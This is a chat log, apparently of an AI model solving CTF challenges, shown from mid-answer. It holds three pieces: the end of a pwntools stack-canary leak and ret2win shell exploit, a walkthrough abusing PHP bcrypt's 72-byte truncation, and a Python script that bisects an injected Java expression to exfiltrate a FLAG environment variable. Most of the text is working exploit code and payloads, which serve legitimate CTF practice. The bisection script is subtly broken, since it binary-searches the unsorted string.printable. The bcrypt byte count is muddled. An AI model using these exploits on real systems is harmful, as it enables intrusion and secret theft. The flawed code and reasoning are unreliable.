    exit()

canary = u64(leaked_data[:8])
log.success(f"Leaked canary: {hex(canary)}")

# --- Overwrite Return Address ---
padding = b'B' * 256
saved_rbp = b'C' * 8
wish_addr = p64(elf.symbols['wish']) # Get address of wish()

payload_exploit = padding + p64(canary) + saved_rbp + wish_addr
log.info("Sending exploit payload...")
p.send(payload_exploit) # Second read

# Should get a shell
p.interactive()

This provides a clear path to exploit the vulnerabilities found in the decompiled code. The main challenges are correctly predicting the rand() seed and carefully crafting the payloads to leak the canary and overwrite the return address.

User: This is a CTF challenge.

<?php
highlight_file(__FILE__);

$password =
    "Never gonna give you up," .
    "Never gonna let you down," .
    "Never gonna run around and desert you." .
    "Never gonna make you cry," .
    "Never gonna say goodbye," .
    "Never gonna tell a lie and hurt you.";
assert(strlen($password) === 172);

if (isset($_GET["input"])) {
    $input = $_GET["input"]; // try to input something with the same hash
    $input_hash = password_hash($input, PASSWORD_BCRYPT);

    if (strlen($input) < strlen($password) / 2) { // but shorter
        if (strpos($input, "cry") === false) { // and don't cry
            if (password_verify($password, $input_hash)) {
                echo 'impossible!' . PHP_EOL;
                include 'rickroll.php';
                echo $flag;
                die();
            }
        }
    }

    echo 'hello hacker';
}

?>

Model: [Thought snipped] Okay, let's analyze the PHP code step by step to find the vulnerability and craft the exploit.

1. The Goal: We need to make all the if conditions evaluate to true to reach the echo $flag; line.

2. Conditions:

   • isset($_GET["input"]): We need to provide a GET parameter named input.
   • strlen($input) < strlen($password) / 2: The length of our input must be less than half the length of the $password. Since strlen($password) is asserted to be 172, strlen($password) / 2 is 86. So, strlen($input) must be less than 86 (i.e., 85 or less).
   • strpos($input, "cry") === false: Our input string must not contain the substring "cry".
   • password_verify($password, $input_hash): This is the most interesting condition.
     • $input_hash is calculated as password_hash($input, PASSWORD_BCRYPT). It's the bcrypt hash of our input.
     • password_verify() checks if the first argument ($password, the long Rick Astley string) matches the hash provided in the second argument ($input_hash).

3. The Vulnerability (password_verify and password_hash with BCrypt):

   • password_hash with PASSWORD_BCRYPT has a known limitation: it only considers the first 72 bytes of the input string when generating the hash. Any characters beyond the 72nd byte are ignored.
   • password_verify($plain_password, $hash) works by:
     1. Extracting the salt and cost factor from the $hash string.
     2. Hashing the $plain_password using those extracted parameters (salt, cost). Crucially, due to the bcrypt limitation, it only uses the first 72 bytes of $plain_password for this internal hashing step.
     3. Comparing the internally generated hash with the hash part stored in the $hash string.

4. Exploitation Strategy:

   • We control $input.
   • We generate $input_hash from our $input.
   • The final check is password_verify($password, $input_hash).
   • For this to be true, hashing the first 72 bytes of $password (the Rick Astley string) using the salt from $input_hash must result in the same hash value stored within $input_hash.
   • Since $input_hash was generated by hashing $input (which also has the 72-byte limitation) using its own salt, the only way for the password_verify check to succeed is if the first 72 bytes of $input are identical to the first 72 bytes of $password.
   • If the first 72 bytes match, then:
     • password_hash($input, ...) produces a hash based on those 72 bytes.
     • password_verify($password, ...) will effectively hash the same 72 bytes (from the start of $password) using the salt from the hash of $input, resulting in a match.

5. Crafting the Payload:

   • We need the first 72 bytes of the $password string.
   • $password = "Never gonna give you up," . "Never gonna let you down," . "Never gonna run around and desert you." . ...
   • Let's concatenate and take the first 72 characters:
     "Never gonna give you up,Never gonna let you down,Never gonna run around and desert you."
     Length of first part: 25
     Length of second part: 26
     Total so far: 51
     We need 72 - 51 = 21 characters from the third part: "Never gonna run aroun" (note the trailing 'd' is the 72nd char).
     Wait, let's recalculate carefully including the concatenated string directly.

     $p = "Never gonna give you up," . "Never gonna let you down," . "Never gonna run around and desert you.";
     echo substr($p, 0, 72);
     // Output: Never gonna give you up,Never gonna let you down,Never gonna run around a

   • So, our required input is: Never gonna give you up,Never gonna let you down,Never gonna run around a

6. Checking Constraints:

   • $input = "Never gonna give you up,Never gonna let you down,Never gonna run around a"
   • strlen($input) is 72. Is 72 < 86? Yes.
   • Does $input contain "cry"? No, the word "cry" appears later in the full password string, not within the first 72 bytes. strpos($input, "cry") === false is true.

7. Final Request:
   Send a GET request to the challenge URL with the input parameter set to the 72-byte prefix we found. URL encoding spaces and commas is good practice:

   ?input=Never+gonna+give+you+up%2CNever+gonna+let+you+down%2CNever+gonna+run+around+a

This input should satisfy all conditions and trigger the flag output.

User: In a CTF challenge, an endpoint queried like this returns whether the first character of the flag (FLAG[0]) is less than "P".

fetch('/api/grader', {
  headers: {'content-type': 'application/json'},
  body: JSON.stringify({scores: [1919810], rules:[{
    grade: '',
    leftScore: 114514, leftSymbol: ',java.lang.System.env./*',
    rightSymbol: '*/FLAG[0]<"P")//', rightScore: 0,
  }]}),
  method: 'POST',
})

The endpoint returns JSON [""] if the first character is indeed less than "P", and ["N/A"] otherwise.

Write code to bisect and print the flag by requesting the endpoint repeatedly until the end of the flag (a curly bracket }) is reached.

Model: [废话]

import requests
import string

def check_char_less_than(pos, char):
    url = '/api/grader'
    headers = {'Content-Type': 'application/json'}
    
    # Construct the comparison string for the current position
    left_symbol = f',java.lang.System.env./*'
    right_symbol = f'*/FLAG[{pos}]<"{char}")//'
    
    payload = {
        "scores": [1919810],
        "rules": [{
            "grade": "",
            "leftScore": 114514,
            "leftSymbol": left_symbol,
            "rightSymbol": right_symbol,
            "rightScore": 0
        }]
    }
    
    response = requests.post(url, headers=headers, json=payload)
    return response.json() == [""]

def find_char(pos):
    # Possible characters in the flag (assuming it's printable ASCII)
    chars = string.printable
    low = 0
    high = len(chars) - 1
    
    while low <= high:
        mid = (low + high) // 2
        current_char = chars[mid]
        
        if check_char_less_than(pos, current_char):
            high = mid - 1
        else:
            low = mid + 1
    
    # After loop, high is the largest index where condition is true
    if high < 0:
        return chars[0]  # Edge case - first character
    return chars[high]

def extract_flag():
    flag = ""
    pos = 0
    
    while True:
        current_char = find_char(pos)
        flag += current_char
        print(f"Found so far: {flag}")
        
        if current_char == '}':
            break
        pos += 1
    
    return flag

if __name__ == "__main__":
    final_flag = extract_flag()
    print(f"Extracted flag: {final_flag}")

[废话]